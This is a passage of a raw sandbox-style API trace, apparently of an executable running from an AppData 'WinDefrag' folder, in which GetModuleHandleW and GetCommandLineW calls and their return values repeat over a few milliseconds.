returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.847] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.847] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.847] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.847] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.847] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.848] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.848] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.848] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.848] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.848] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.848] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.848] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.848] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.848] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.848] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.848] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.848] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.848] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.848] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.848] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.848] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.848] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.848] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.848] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.848] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.849] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.849] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.849] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.849] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.849] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.849] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.849] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.849] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.849] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.849] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.849] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.849] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.849] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.849] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.849] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.849] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.849] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.849] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.849] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.849] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.849] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.850] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.850] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.850] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.850] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.850] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.850] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.850] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.850] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.850] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.850] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.850] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.850] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.850] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.850] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.850] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.850] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.850] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.850] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.850] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.850] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.851] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.851] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.851] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.851] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.851] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.851] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.851] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.851] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.851] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.851] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.851] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.851] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.851] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.851] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.851] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.851] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.851] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.851] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.851] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.851] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.852] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.852] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.852] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.852] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.852] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.852] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.852] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.852] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.852] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.852] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.852] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.852] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.852] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.852] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.852] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.852] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.852] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.852] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.852] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.852] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.853] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.853] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.853] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.853] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.853] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.853] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.853] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.853] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.853] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.853] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.853] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.853] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.853] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.853] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.853] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.853] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.853] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.853] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.853] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.853] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.854] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.854] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.854] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.854] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.854] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.854] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.854] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.854] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.854] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.854] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.854] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.854] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.854] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.854] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.854] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.854] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.854] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.854] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.854] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.854] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.855] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.855] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.855] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.855] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.855] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.855] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.855] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.855] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.855] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.855] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.855] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.855] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.855] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.855] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.855] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.855] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.855] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.855] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.855] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.855] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.855] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.856] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.856] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.856] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.856] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.856] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.856] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.856] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.856] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.856] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.856] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.856] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.856] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.856] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.856] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.856] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.856] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.856] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.856] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.856] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.856] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.856] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.857] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.857] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.857] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.857] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.857] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.857] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.857] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.857] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.857] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.857] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.857] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.857] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.857] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.857] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.857] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.857] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.857] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.857] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.857] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.857] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.857] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.857] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.858] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.858] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.858] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.858] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.858] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.858] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.858] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.858] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.858] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.858] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.858] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.858] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.858] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.858] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.858] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.858] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.858] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.858] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.858] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.858] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.859] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.859] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.859] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.859] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.859] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.859] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.859] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.859] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.859] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.859] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.859] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.859] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.859] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.859] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.859] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.859] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.860] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.860] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.860] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.860] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.860] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.860] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.860] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.860] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.860] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.860] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.860] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.860] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.860] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.860] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.860] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.860] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.861] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.861] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.861] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.861] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.861] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.861] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.861] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.861] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.861] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.861] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.861] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.861] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.861] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.861] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.861] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.861] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.861] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.861] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.861] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.861] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.861] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.862] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.862] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.862] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.862] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.862] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.862] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.862] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.862] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.862] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.862] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.862] GetCommandLineW () 